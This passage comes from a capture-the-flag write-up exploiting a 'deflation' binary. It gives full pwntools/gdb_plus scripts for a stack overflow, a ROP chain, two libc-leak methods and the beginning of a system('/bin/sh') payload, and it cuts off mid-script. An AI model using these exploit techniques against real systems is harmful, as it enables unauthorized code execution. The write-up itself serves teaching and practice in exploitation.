dbg.p.sendline(b"C" * 0x100)
dbg.finish()
print(dbg.read(buffer_address, 0x100))

As expected the first call to fread consumed the Bs we used as padding, while the second one is taking the data we send next.

sent 0x3200 bytes
fread -> 0x3100
b'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'
b'CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC'

Now we have to make sure that the program surviving a full stack is not just because gdb is keeping it alive or because my system has some strange permissions. So let’s test it remotely.

from gdb_plus import *

HOST = "127.0.0.1"
PORT = 4000
binary_name = "./deflation"
context.binary = binary_name

def shift(array, n):
  return array[n:] + array[:n]

target = p64(0x0401096)[:-1]
data = bytes([i for i in range(256) if i not in target])
payload_1 = shift(data, 94) + target
payload_1 = payload_1[-256:]

with Debugger(context.binary).remote(HOST, PORT) as dbg:
  dbg.p.send(payload_1)
  expected_data = dbg.p.recv()

dbg = Debugger(context.binary).remote(HOST, PORT)
dbg.c(wait=False)
for i in range(10):
  p = log.progress(f"loop {i + 1}")
  dbg.p.send(payload_1)
  data = dbg.p.recv()
  assert data == expected_data

  p.status("Sending second payload")
  ropchain = b""
  payload_2 = b"A" * 264 + ropchain
  payload_2 += p64(dbg.elf.symbols["main"]) * ((0x1000 - len(payload_2)) // 8)
  dbg.p.send(payload_2)    # We could try to check the output to see what was left in the buffer
  while dbg.p.recv(timeout=0.5) == b"":
    dbg.p.send(p64(dbg.elf.symbols["main"]) * 0x100)
  dbg.p.recv(timeout=0.5) # Empty buffer if not done yet
  p.success("Done")

Indeed the buffer is perfectly aligned and we can repeat the process multiple times!

$python3 test_remote.py REMOTE
[+] loop 1: Done
[+] loop 2: Done
[+] loop 3: Done
[+] loop 4: Done
[+] loop 5: Done
[+] loop 6: Done
[+] loop 7: Done
[+] loop 8: Done
[+] loop 9: Done
[+] loop 10: Done

Second payload: leak the libc

While the buffer overflow was quite straightforward, the main challenge starts now. We have good control over the execution of the program, but we still have to find a way to leak data from it. The basic idea would be to call something like fwrite(got, 1, x, stdout), but the main limitation we face is that the gadgets found with ROPgadget only let us set rsi and rdi, so we don’t control the third and fourth arguments of the functions we want to call.

Failed attempts and unintended solution

Jumping inside vuln to call fwrite with data from the GOT

Since we cannot set the fourth argument of fwrite, the only way to have stdout in place when we call it is to let vuln set it first.

If we look at the code of vuln, stdout is loaded in the registers right after the call to deflateEnd, while the buffer to print is taken from rbp.

        0040125f e8 0c fe        CALL       <EXTERNAL>::deflateEnd
                 ff ff
        00401264 48 8b 0d        MOV        RCX,qword ptr [stdout]
                 b5 2d 00 00
        0040126b 48 89 ef        MOV        user_buffer,RBP
        0040126e 48 8b 15        MOV        RDX,qword ptr [strm[40]]
                 f3 2d 00 00
        00401275 be 01 00        MOV        len,0x1
                 00 00
        0040127a e8 01 fe        CALL       <EXTERNAL>::fwrite
                 ff ff

We can therefore try to send an address we want to leak, such as got.fwrite, just before our return address so that it gets loaded in the base pointer and then jump to 0x0401264.

payload_2 = b"A" * 256 + p64(dbg.elf.symbols["got.fwrite"]) + p64(0x0401264) # vuln.fwrite takes rbp as the buffer

This attack does leak the GOT, but vuln implements its own version of leave using r13 instead of rbp, so we segfault when we try to continue because the stack gets corrupted. The only ways to avoid this problem would be to create a fake stack in the bss or to jump before r13 is set.

Creating a fake stack in the bss could be an option, but I hadn’t found a gadget to write there before solving the challenge (you can try it if you want 😉). Letting vuln save the stack pointer in r13, on the other hand, is not an option in this case: r13 is set before the calls to deflate and memcpy, which write to the buffer, so we would at least need a writable buffer instead of the GOT, which is read-only because of Full RELRO.

Full script:
from gdb_plus import *

def unzip(data):
  with context.silent:
    p = process("./inflation")
    p.send(data)
    p.stdin.close()
    data = p.recv()
    p.close()
  return data

target = p64(0x0401096)[:-1]
data = bytes([i for i in range(256) if i not in target])
def shift(array, n):
  return array[n:] + array[:n]
payload = shift(data, 94) + target
payload = payload[-256:]

binary_name = "./deflation"
context.binary = binary_name
dbg = Debugger(context.binary)

# Setup second call to read
dbg.p.send(payload)
dbg.until("main+57")
dbg.call("fflush", [0])
dbg.p.recv()

payload_2 = b"A" * 256 + p64(dbg.elf.symbols["got.fwrite"]) + p64(0x0401264)
dbg.p.send(payload_2)
done = dbg.until("main+57", wait=False, loop=True)
while not done.wait(timeout=0.5):
    dbg.p.send(p64(dbg.elf.symbols["main"]) * 0x20)
dbg.call("fflush", [0])
dbg.p.recv()

dbg.until("fwrite")
dbg.finish()
dbg.call("fflush", [0])
data = dbg.p.recv()
log.success(f"leaked: {hex(u64(data[:8]))}")

Jumping inside vuln to copy the GOT and then print it

Jumping at the end of vuln is not possible because of how the function cleans the stack, so we can try to jump in the middle of the function instead. For example we can jump right after deflate has been called, pretend the GOT contains our compressed data, and then let the function copy it back to the stack or the bss before printing it with fwrite.

To call memcpy, though, vuln uses r13 as the src. This prevents us from pointing both to the GOT, to copy libc addresses, and to the stack, to keep the frame valid. It seems like there is no way to leak data with vuln that is not in the buffer that gets compressed, and therefore we cannot leak data without also overwriting it.

Calling vuln to compress strm itself

The only option left then is to find a libc address in the bss. We need an area that we can compress and overwrite with vuln, but at the same time contains an address to the libc.

Letting vuln corrupt the pointers to stdin and stdout is not an option since it would break the program, but if we look at the strm structure we can see that two pointers are used for the data on the stack and two more are function pointers that look like libc addresses. We may try to leak those last two, hoping that they are not needed after calling deflate.

(remote) gef➤  x/14gx 0x0404040
0x404040 <strm>:	0x00007ffdeb951a30	0x0000000000000000
0x404050 <strm+16>:	0x0000000000000100	0x00007ffdeb951818
0x404060 <strm+32>:	0x00000000000001e8	0x0000000000000018
0x404070 <strm+48>:	0x0000000000000000	0x000000001eb082b0
0x404080 <strm+64>:	0x00007fd31436a3d0	0x00007fd31436a3e0
0x404090 <strm+80>:	0x0000000000000000	0x0000000000000001
0x4040a0 <strm+96>:	0x0000000049975b13	0x0000000000000000

The problem here is not so much that those function pointers are used later in deflateEnd, causing, again, a segfault, but mostly (as I only realized while writing this) that they are NOT libc addresses, but addresses in libz! They are zalloc and zfree (strm+64 and strm+72): vuln zeroes them before calling deflateInit2_, which then replaces them with zlib’s own default allocation functions.

[addr = `0x00007fd31436a3e0`]
0x00007fd314367000 0x00007fd314378000 0x0000000000002000 r-x /usr/lib/x86_64-linux-gnu/libz.so.1.2.11
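Checking which mapping a leaked pointer belongs to before building on it would have saved me some time. A minimal sketch that looks an address up in the text of /proc/&lt;pid&gt;/maps; the sample line is hypothetical, rebuilt from the vmmap output above with made-up device and inode fields.

```python
from typing import Optional

def find_mapping(maps_text: str, address: int) -> Optional[str]:
    """Return the path of the /proc/<pid>/maps entry that contains `address`."""
    for line in maps_text.splitlines():
        fields = line.split(maxsplit=5)  # range perms offset dev inode [path]
        if len(fields) < 5:
            continue
        start, end = (int(x, 16) for x in fields[0].split("-"))
        if start <= address < end:
            return fields[5] if len(fields) == 6 else "[anonymous]"
    return None

# Hypothetical maps line rebuilt from the vmmap output above (dev and inode are made up).
sample = "7fd314367000-7fd314378000 r-xp 00002000 00:00 0    /usr/lib/x86_64-linux-gnu/libz.so.1.2.11"
for addr in (0x7fd31436a3d0, 0x7fd31436a3e0):
    print(hex(addr), "->", find_mapping(sample, addr))
```

On a live process the input would simply be open(f"/proc/{pid}/maps").read().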
Create fake strm to leak libz and then call vuln(libz.GOT)

I wanted to add one more option, now that I started thinking about libz, in case someone is wondering why it would fail. Looking at libz, we can see that the library is only partial RELRO. This means that, although it will probably break something, we can still try to use its GOT as buffer, letting vuln overwrite part of it in exchange for leaking the addresses it contained.

To avoid a segfault when leaking libz, though, we first need to create a fake strm structure and let vuln populate it. Once it is in the bss, we can call vuln legitimately, this time to compress this fake structure, without worrying about the compression crashing, since those function pointers are not used anymore.

                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined __stdcall vuln(undefined8 user_buffer, int len)
             undefined         AL:1           <RETURN>
             undefined8        RDI:8          user_buffer
             int               ESI:4          len
             undefined[256]    Stack[-0x128   tmp_buffer
                             vuln
        004011c0 41 55           PUSH       R13
        004011c2 66 0f ef c0     PXOR       XMM0,XMM0
        004011c6 48 8d 05        LEA        RAX,[s_1.2.11_00402004]
                 37 0e 00 00
        004011cd 45 31 c9        XOR        R9D,R9D
        004011d0 41 54           PUSH       R12
        004011d2 41 b8 08        MOV        R8D,0x8
                 00 00 00
        004011d8 b9 1f 00        MOV        ECX,0x1f
                 00 00
        004011dd 4c 8d 25        LEA        R12,[strm]
                 5c 2e 00 00
        004011e4 55              PUSH       RBP

strm is loaded in r12 as an absolute address, so to create a fake structure we need to jump to 0x4011e4 with r12 pointing to a writable area. I will use the empty bss right after strm itself, so dbg.elf.symbols["strm"] + 112, and as the buffer to compress I will just take the empty data at dbg.elf.symbols["strm"] + 112 * 2. If this works, we are left with a copy of strm in the bss that we can then compress and receive by calling vuln normally: vuln(dbg.elf.symbols["strm"] + 112, 112).
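The address arithmetic and the layout of the resulting chain can be sketched without pwntools. The gadget addresses (0x4012eb, 0x4012e9, 0x40128b), the 264 bytes of padding and the jump target 0x4011e4 are taken from the snippet below, strm = 0x404040 comes from the gdb dump above, and 112 is `sizeof(z_stream)` on x86-64. The constant names are hypothetical labels introduced only for readability.

```python
import struct

def p64(x: int) -> bytes:
    """Pack a 64-bit little-endian value (same as pwntools' p64)."""
    return struct.pack("<Q", x)

STRM = 0x404040                      # &strm in the non-PIE binary
SIZEOF_Z_STREAM = 112                # sizeof(z_stream) on x86-64
FAKE_STRM = STRM + SIZEOF_Z_STREAM   # empty bss used as the fake z_stream
SRC_BUF = STRM + 2 * SIZEOF_Z_STREAM # empty bss passed as user_buffer

POP_RDI = 0x4012eb                   # pop rdi; ret
POP_RSI_R15 = 0x4012e9               # pop rsi; pop r15; ret
POP_R12_R13 = 0x40128b               # pop r12; pop r13; ret
VULN_AFTER_LEA_STRM = 0x4011e4       # first instruction after `lea r12, [strm]`
JUNK = 0xdeadbeef12345678            # filler for the extra pops

chain = b"".join(map(p64, [
    POP_RDI, SRC_BUF,                # rdi = user_buffer
    POP_RSI_R15, 1, JUNK,            # rsi = len
    POP_R12_R13, FAKE_STRM, JUNK,    # r12 = what vuln will treat as strm
    VULN_AFTER_LEA_STRM,
]))
payload = b"A" * 264 + chain
print(hex(FAKE_STRM), hex(SRC_BUF), len(payload))
```

The two computed addresses, 0x4040b0 and 0x404120, are the same ones that show up later as the first arguments of `deflateInit2_` and `memcpy` in the gdb trace.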

...
pop_rdi = lambda rdi: p64(0x4012eb) + p64(rdi)
pop_rsi = lambda rsi: p64(0x4012e9) + p64(rsi) + p64(0xdeadbeef12345678)  # pop rsi; pop r15; ret
pop_r12 = lambda r12: p64(0x40128b) + p64(r12) + p64(0xdeadbeef12345678) # pop r12; pop r13; ret
payload_2 = b"A" * 264 + pop_rdi(dbg.elf.symbols["strm"] + 112 * 2) + pop_rsi(1) + pop_r12(dbg.elf.symbols["strm"] + 112) + p64(0x04011e4)
payload_2 += p64(dbg.elf.symbols["main"]) * (0x200 - len(payload_2) // 0x8)
dbg.p.send(payload_2)
done = dbg.until("main+57", wait=False, loop=True)
while not done.wait(timeout=0.5):
    dbg.p.send(b"A" * 0x100)
dbg.call("fflush", [0])
dbg.p.recv()
dbg.until("main") # Execute our ropchain and wait for the process to call main again
dbg.call("fflush", [0])
data = dbg.p.recv()
print(data)
full script
from gdb_plus import *

def unzip(data):
  with context.silent:
    p = process("./inflation")
    p.send(data)
    p.stdin.close()
    data = p.recv()
    p.close()
  return data

target = p64(0x0401096)[:-1]
data = bytes([i for i in range(256) if i not in target])
def shift(array, n):
  return array[n:] + array[:n]
payload = shift(data, 94) + target
payload = payload[-256:]

binary_name = "./deflation"
context.binary = binary_name
dbg = Debugger(context.binary)

# Setup second call to read
dbg.p.send(payload)
dbg.until("main+57")
dbg.call("fflush", [0])
dbg.p.recv()
pop_rdi = lambda rdi: p64(0x4012eb) + p64(rdi)
pop_rsi = lambda rsi: p64(0x4012e9) + p64(rsi) + p64(0xdeadbeef12345678)  # pop rsi; pop r15; ret
pop_r12 = lambda r12: p64(0x40128b) + p64(r12) + p64(0xdeadbeef12345678) # pop r12; pop r13; ret
payload_2 = b"A" * 264 + pop_rdi(dbg.elf.symbols["strm"] + 112 * 2) + pop_rsi(1) + pop_r12(dbg.elf.symbols["strm"] + 112) + p64(0x04011e4)
payload_2 += p64(dbg.elf.symbols["main"]) * (0x200 - len(payload_2) // 0x8)
dbg.p.send(payload_2)
done = dbg.until("main+57", wait=False, loop=True)
while not done.wait(timeout=0.5):
    dbg.p.send(b"A" * 0x100)
dbg.call("fflush", [0])
dbg.p.recv()
dbg.until("main")
dbg.call("fflush", [0])
data = dbg.p.recv()
print(data)
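The scripts shell out to a separate `./inflation` helper (not shown in this writeup) to decompress what the binary sends back. Since vuln sets windowBits to 0x1f (31, i.e. gzip framing, judging from the `MOV ECX,0x1f` before the `deflateInit2_` call), a pure-Python stand-in based on the standard `zlib` module could look like the following. It is a hypothetical replacement, not the helper used above; `wbits=47` asks zlib to auto-detect either a gzip or a zlib header.

```python
import zlib

def unzip(data: bytes) -> bytes:
    """Hypothetical stand-in for ./inflation: decompress a gzip/zlib stream.

    A decompressobj is used instead of zlib.decompress so that a stream that
    is cut short (e.g. missing its trailer) still returns what was decoded.
    """
    inflater = zlib.decompressobj(wbits=47)  # 32 + 15: auto-detect gzip or zlib header
    try:
        return inflater.decompress(data)
    except zlib.error:
        # Mimic the error message printed by the original helper.
        return b"inflate failed\n"
```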

This approach makes absolutely no sense, though, since we are skipping the part that sets the arguments for deflateInit2_, so our fake structure will never get populated and we will have nothing to leak. Or, more likely, the function will just crash.

Surprisingly, though, while trying to show the exact moment where the program would crash, I noticed that it just wouldn't. Not only does the function not crash, but when deflate is called the data we receive seems to be the uninitialized stack of a function, and inside it we do have addresses that seem to come from the libc… My best guess is that, since the object is not initialized, deflate doesn't do anything, but we still end up copying what we think is the output, which is instead uninitialized data, in this case containing random libc addresses.

b'k\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00h\r\x00\x00\x00\x00\x00\x00\xa0\xc8\xe6\xa9"\x7f\x00\x00@\xa7\xca\xa9"\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\xe7\xd2\xa9"\x7f\x00\x00\xa0\xc6\xe6\xa9"\x7f\x00\x00\x02\x04\xd3\xa9"\x7f\x00\x00AAAA\x00\x00\x00\x00AAAAAAAAp\xec\xd2\xa9"\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00AAA'

In [3]: unzip(data)
Out[3]: b'inflate failed\n'

In [4]: for i in range(0, len(data), 8):
   ...:     print(hex(u64(data[i:i+8])))
0x6b
0x1
0xd68
0x7f22a9e6c8a0
0x7f22a9caa740
0x0
0x7f22a9d2e709
0x7f22a9e6c6a0
0x7f22a9d30402
0x41414141
0x4141414141414141
0x7f22a9d2ec70
0x0

Let’s make sure that the address is consistent between runs and on the remote server.

...
for i in range(5):
  ...
  pop_rdi = lambda rdi: p64(0x4012eb) + p64(rdi)
  pop_rsi = lambda rsi: p64(0x4012e9) + p64(rsi) + p64(0xdeadbeef12345678)  # pop rsi; pop r15; ret
  pop_r12 = lambda r12: p64(0x40128b) + p64(r12) + p64(0xdeadbeef12345678) # pop r12; pop r13; ret
  payload_2 = b"A" * 264 + pop_rdi(dbg.elf.symbols["strm"] + 112 * 2) + pop_rsi(1) + pop_r12(dbg.elf.symbols["strm"] + 112) + p64(0x04011e4)
  payload_2 += p64(dbg.elf.symbols["main"]) * (0x200 - len(payload_2) // 0x8)
  dbg.p.send(payload_2)
  done = dbg.until("main+57", wait=False, loop=True)
  while not done.wait(timeout=0.5):
      dbg.p.send(b"A" * 0x100)
  dbg.call("fflush", [0])
  dbg.p.recv()
  dbg.until("main") # Execute our ropchain and wait for the process to call main again
  dbg.call("fflush", [0])
  data = dbg.p.recv()
  log.info(hex(u64(data[11*8:12*8]) - dbg.libc.address))
full script
from gdb_plus import *

def unzip(data):
  with context.silent:
    p = process("./inflation")
    p.send(data)
    p.stdin.close()
    data = p.recv()
    p.close()
  return data

target = p64(0x0401096)[:-1]
data = bytes([i for i in range(256) if i not in target])
def shift(array, n):
  return array[n:] + array[:n]
payload = shift(data, 94) + target
payload = payload[-256:]

binary_name = "./deflation"
context.binary = binary_name

for i in range(5):
  with Debugger(context.binary) as dbg:

    # Setup second call to read
    dbg.p.send(payload)
    dbg.until("main+57")
    dbg.call("fflush", [0])
    dbg.p.recv()
    pop_rdi = lambda rdi: p64(0x4012eb) + p64(rdi)
    pop_rsi = lambda rsi: p64(0x4012e9) + p64(rsi) + p64(0xdeadbeef12345678)  # pop rsi; pop r15; ret
    pop_r12 = lambda r12: p64(0x40128b) + p64(r12) + p64(0xdeadbeef12345678) # pop r12; pop r13; ret
    payload_2 = b"A" * 264 + pop_rdi(dbg.elf.symbols["strm"] + 112 * 2) + pop_rsi(1) + pop_r12(dbg.elf.symbols["strm"] + 112) + p64(0x04011e4)
    payload_2 += p64(dbg.elf.symbols["main"]) * (0x200 - len(payload_2) // 0x8)
    dbg.p.send(payload_2)
    done = dbg.until("main+57", wait=False, loop=True)
    while not done.wait(timeout=0.5):
        dbg.p.send(b"A" * 0x100)
    dbg.call("fflush", [0])
    dbg.p.recv()
    dbg.until("main")
    dbg.call("fflush", [0])
    data = dbg.p.recv()
    log.info(hex(u64(data[11*8:12*8]) - dbg.libc.address))

Indeed the offset is always the same… So we do have a leak of the libc that doesn’t crash the program…

[*] 0x81c70
[*] 0x81c70
[*] 0x81c70
[*] 0x81c70
[*] 0x81c70
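Turning the raw bytes into a libc base only takes a couple of lines. The sketch below reuses the bytes printed for the first run above, keeps only whole qwords (the trailing `b"AAA"` would make a strict 8-byte unpack fail), takes qword 11 as in the loop, and subtracts the constant offset 0x81c70 measured above. The page-alignment assertion is an extra sanity check that is not part of the original scripts: a libc base must end in 0x000, so a wrong index or offset is usually caught immediately.

```python
import struct

LEAK_INDEX = 11        # qword index used in the loop above
LEAK_OFFSET = 0x81c70  # constant offset from the libc base observed across runs

# Bytes received in the first run above, split at qword boundaries.
data = (
    b'k\x00\x00\x00\x00\x00\x00\x00'
    b'\x01\x00\x00\x00\x00\x00\x00\x00'
    b'h\r\x00\x00\x00\x00\x00\x00'
    b'\xa0\xc8\xe6\xa9"\x7f\x00\x00'
    b'@\xa7\xca\xa9"\x7f\x00\x00'
    b'\x00\x00\x00\x00\x00\x00\x00\x00'
    b'\t\xe7\xd2\xa9"\x7f\x00\x00'
    b'\xa0\xc6\xe6\xa9"\x7f\x00\x00'
    b'\x02\x04\xd3\xa9"\x7f\x00\x00'
    b'AAAA\x00\x00\x00\x00'
    b'AAAAAAAA'
    b'p\xec\xd2\xa9"\x7f\x00\x00'
    b'\x00\x00\x00\x00\x00\x00\x00\x00'
    b'AAA'
)

# Unpack only whole little-endian qwords, dropping the partial tail.
qwords = [q for (q,) in struct.iter_unpack("<Q", data[: len(data) // 8 * 8])]
leak = qwords[LEAK_INDEX]
libc_base = leak - LEAK_OFFSET
assert libc_base & 0xfff == 0, "libc base should be page aligned"
print(f"leak={leak:#x} libc_base={libc_base:#x}")
```

If the offset holds for that first run as well, the resulting base (0x7f22a9cad000) is indeed page aligned.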

Well, nice to have such ideas only after solving the challenge…

Now I’m curious about why it happens though.

...
dbg.until("vuln+0x55")
print(f"calling deflateInit2_({', '.join(map(hex, [dbg.args[i] for i in range(8)]))})")

print("fake struct before deflateInit2_:")
print(dbg.execute("x/14gx 0x4040b0"))

dbg.ni()
print("fake struct after deflateInit2_:")
print(dbg.execute("x/14gx 0x4040b0"))
print(f"return value deflateInit2_: {hex(dbg.rax)}")

dbg.until("deflate")
print(f"calling deflate({', '.join(map(hex, [dbg.args[i] for i in range(2)]))})")
dbg.finish()
print(f"return value deflate: {hex(dbg.rax)}")

dbg.until("vuln+0x97")
print(f"calling memcpy({', '.join(map(hex, [dbg.args[i] for i in range(3)]))})")
full script
from gdb_plus import *

def unzip(data):
  with context.silent:
    p = process("./inflation")
    p.send(data)
    p.stdin.close()
    data = p.recv()
    p.close()
  return data

target = p64(0x0401096)[:-1]
data = bytes([i for i in range(256) if i not in target])
def shift(array, n):
  return array[n:] + array[:n]
payload = shift(data, 94) + target
payload = payload[-256:]

binary_name = "./deflation"
context.binary = binary_name
dbg = Debugger(context.binary)

# Setup second call to read
dbg.p.send(payload)
dbg.until("main+57")
dbg.call("fflush", [0])
dbg.p.recv()
pop_rdi = lambda rdi: p64(0x4012eb) + p64(rdi)
pop_rsi = lambda rsi: p64(0x4012e9) + p64(rsi) + p64(0xdeadbeef12345678)  # pop rsi; pop r15; ret
pop_r12 = lambda r12: p64(0x40128b) + p64(r12) + p64(0xdeadbeef12345678) # pop r12; pop r13; ret
payload_2 = b"A" * 264 + pop_rdi(dbg.elf.symbols["strm"] + 112 * 2) + pop_rsi(1) + pop_r12(dbg.elf.symbols["strm"] + 112) + p64(0x04011e4)
payload_2 += p64(dbg.elf.symbols["main"]) * (0x200 - len(payload_2) // 0x8)
dbg.p.send(payload_2)
done = dbg.until("main+57", wait=False, loop=True)
while not done.wait(timeout=0.5):
    dbg.p.send(b"A" * 0x100)
dbg.call("fflush", [0])
dbg.p.recv()

dbg.until("vuln+0x55")
print(f"calling deflateInit2_({', '.join(map(hex, [dbg.args[i] for i in range(8)]))})")

print("fake struct before deflateInit2_:")
print(dbg.execute("x/14gx 0x4040b0"))

dbg.ni()
print("fake struct after deflateInit2_:")
print(dbg.execute("x/14gx 0x4040b0"))
print(f"return value deflateInit2_: {hex(dbg.rax)}")

dbg.until("deflate")
print(f"calling deflate({', '.join(map(hex, [dbg.args[i] for i in range(2)]))})")
dbg.finish()
print(f"return value deflate: {hex(dbg.rax)}")

dbg.until("vuln+0x97")
print(f"calling memcpy({', '.join(map(hex, [dbg.args[i] for i in range(3)]))})")
calling deflateInit2_(0x4040b0, 0xffffffff, 0x8, 0xc00, 0x6a, 0x0, 0x0, 0x0)
fake struct before deflateInit2_:
0x4040b0:	0x0000000000000000	0x0000000000000000
0x4040c0:	0x0000000000000000	0x0000000000000000
0x4040d0:	0x0000000000000000	0x0000000000000000
0x4040e0:	0x0000000000000000	0x0000000000000000
0x4040f0:	0x0000000000000000	0x0000000000000000
0x404100:	0x0000000000000000	0x0000000000000000
0x404110:	0x0000000000000000	0x0000000000000000

fake struct after deflateInit2_:
0x4040b0:	0x0000000000000000	0x0000000000000000
0x4040c0:	0x0000000000000000	0x0000000000000000
0x4040d0:	0x0000000000000000	0x0000000000000000
0x4040e0:	0x0000000000000000	0x0000000000000000
0x4040f0:	0x0000000000000000	0x0000000000000000
0x404100:	0x0000000000000000	0x0000000000000000
0x404110:	0x0000000000000000	0x0000000000000000

return value deflateInit2_: 0xfffffffa
calling deflate(0x4040b0, 0x4)
return value deflate: 0xfffffffe
calling memcpy(0x404120, 0x7ffe16827468, 0x6a)

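Okay, deflateInit2_ and deflate do return errors, but the program does not check for them. Read as signed ints, 0xfffffffa is -6 (Z_VERSION_ERROR) and 0xfffffffe is -2 (Z_STREAM_ERROR). deflateInit2_ validates its version and stream_size arguments before touching the stream, and both are 0x0 here (most likely because we jumped past the LEA that loads the "1.2.11" version string), so it bails out immediately and the fake structure stays all zeros. deflate then refuses to work on a stream that was never initialized. vuln trusts deflate to fill in the buffer and then blindly sends its content back to us, even though in this case it is still uninitialized.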
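Return values printed from `rax` have to be reinterpreted as signed 32-bit ints before they can be compared with the codes in `zlib.h`. Python's `zlib` module does not export these error constants, so the table below is copied by hand from the zlib header; `zlib_ret` is a hypothetical helper name.

```python
# Return codes from zlib.h (not exposed by Python's zlib module).
Z_CODES = {
    0: "Z_OK", 1: "Z_STREAM_END", 2: "Z_NEED_DICT",
    -1: "Z_ERRNO", -2: "Z_STREAM_ERROR", -3: "Z_DATA_ERROR",
    -4: "Z_MEM_ERROR", -5: "Z_BUF_ERROR", -6: "Z_VERSION_ERROR",
}

def zlib_ret(rax: int) -> str:
    """Interpret the low 32 bits of rax as zlib's signed int return value."""
    value = rax & 0xffffffff
    if value & 0x80000000:
        value -= 1 << 32
    return f"{value} ({Z_CODES.get(value, 'unknown')})"

print("deflateInit2_:", zlib_ret(0xfffffffa))
print("deflate:", zlib_ret(0xfffffffe))
```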

It is nice to have found this unintended solution, but how were we supposed to leak the libc legitimately?

Intended solution

While looking at the addresses in the bss, one thing sticks out. We know about three objects stored there: the stdin and stdout pointers and strm. But the first one, the stdout pointer, is stored at 0x404020, while our page starts at 0x404000. The first 32 bytes are all null, so is there a chance that, if we call vuln(0x404000, 40) to include that pointer, the compressed buffer fits in the unused 32 bytes, since so many bytes are repeated?

...
pop_rdi = lambda rdi: p64(0x4012eb) + p64(rdi)
pop_rsi = lambda rsi: p64(0x4012e9) + p64(rsi) + p64(0xdeadbeef12345678)  # pop rsi; pop r15; ret
payload_2 = b"A" * 264 + pop_rdi(0x404000) + pop_rsi(40) + p64(dbg.elf.symbols["vuln"])
payload_2 += p64(dbg.elf.symbols["main"]) * (0x200 - len(payload_2) // 0x8)
dbg.p.send(payload_2)
done = dbg.until("main+57", wait=False, loop=True)
while not done.wait(timeout=0.5):
    dbg.p.send(b"A" * 0x100)
dbg.call("fflush", [0])
dbg.p.recv()
dbg.until("main") # Execute our ropchain and wait for the process to call main again
dbg.call("fflush", [0])
dbg.p.recv()
dbg.until("memcpy")
print(f"compressed length: {dbg.args[2]}/32")
full script
from gdb_plus import *

def unzip(data):
  with context.silent:
    p = process("./inflation")
    p.send(data)
    p.stdin.close()
    data = p.recv()
    p.close()
  return data

target = p64(0x0401096)[:-1]
data = bytes([i for i in range(256) if i not in target])
def shift(array, n):
  return array[n:] + array[:n]
payload = shift(data, 94) + target
payload = payload[-256:]

binary_name = "./deflation"
context.binary = binary_name
dbg = Debugger(context.binary)

# Setup second call to read
dbg.p.send(payload)
dbg.until("main+57")
dbg.call("fflush", [0])
dbg.p.recv()
pop_rdi = lambda rdi: p64(0x4012eb) + p64(rdi)
pop_rsi = lambda rsi: p64(0x4012e9) + p64(rsi) + p64(0xdeadbeef12345678)  # pop rsi; pop r15; ret
payload_2 = b"A" * 264 + pop_rdi(0x404000) + pop_rsi(40) + p64(dbg.elf.symbols["vuln"])
payload_2 += p64(dbg.elf.symbols["main"]) * (0x200 - len(payload_2) // 0x8)
dbg.p.send(payload_2)
done = dbg.until("main+57", wait=False, loop=True)
while not done.wait(timeout=0.5):
    dbg.p.send(b"A" * 0x100)
dbg.call("fflush", [0])
dbg.p.recv()
dbg.until("memcpy")
print(f"compressed length: {dbg.args[2]}/32")
dbg.until("main")
dbg.call("fflush", [0])
data = dbg.p.recv()
print(data)
print(hex(unpack(unzip(data)[-8:])))

Indeed, the compressed data does fit in those unused 32 bytes! We can therefore leak the stdout pointer by calling vuln without any risk of corrupting it.

compressed length: 32/32
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa06\xb9\n\xb9{\x00\x00'
0x7bb90ab936a0
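The same size check can be reproduced offline with Python's `zlib` module. This is a sketch under assumptions: windowBits 31 (gzip framing), memLevel 8 and strategy 0 are read off the `MOV ECX,0x1f`, `MOV R8D,0x8` and `XOR R9D,R9D` in vuln's disassembly, the level of -1 is the value gdb printed for `deflateInit2_`, and the pointer is the one leaked above. Python links its own copy of zlib, so the exact byte count may not match what the binary reports.

```python
import struct
import zlib

# 0x404000-0x404027: 32 unused null bytes followed by the libc pointer at 0x404020.
leaked_ptr = 0x7bb90ab936a0
bss = b"\x00" * 32 + struct.pack("<Q", leaked_ptr)

# Assumed deflateInit2_ parameters: level -1, DEFLATED, windowBits 31 (gzip), memLevel 8, default strategy.
compressor = zlib.compressobj(-1, zlib.DEFLATED, 31, 8, zlib.Z_DEFAULT_STRATEGY)
compressed = compressor.compress(bss) + compressor.flush()

print(f"compressed length: {len(compressed)}/32")
# Sanity check: the gzip stream round-trips back to the original 40 bytes.
assert zlib.decompress(compressed, 31) == bss
```

Even with the 18 bytes of gzip header and trailer, the long run of zeros collapses into a single back-reference, which is what lets 40 bytes of input shrink into roughly the 32 free bytes in front of the pointer.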

Final exploit

Now that we have the libc we can easily build our payload to call system("/bin/sh", 0x0, 0x0). We can find in the libc both a gadget to set the third argument in rdx and the string "/bin/sh\x00".

One small problem I noticed, though, is that the input buffer is still a bit dirty when our exploit executes, and if we just call system the program crashes. It took some attempts to find a workaround, but by calling main once to first empty the data buffered in stdin, and then calling system("/bin/sh") more than once (the chain below queues it three times), the second execution does give us a stable shell.

...
def call(address, args):
    pop_rdi = lambda rdi: [0x4012eb, rdi]
    pop_rsi = lambda rsi: [0x4012e9, rsi, 0] # pop rsi, pop r15
    pop_rdx = lambda rdx: [dbg.libc.address + 0xcb1cd, rdx]
    payload = []
    if len(args) >= 1:
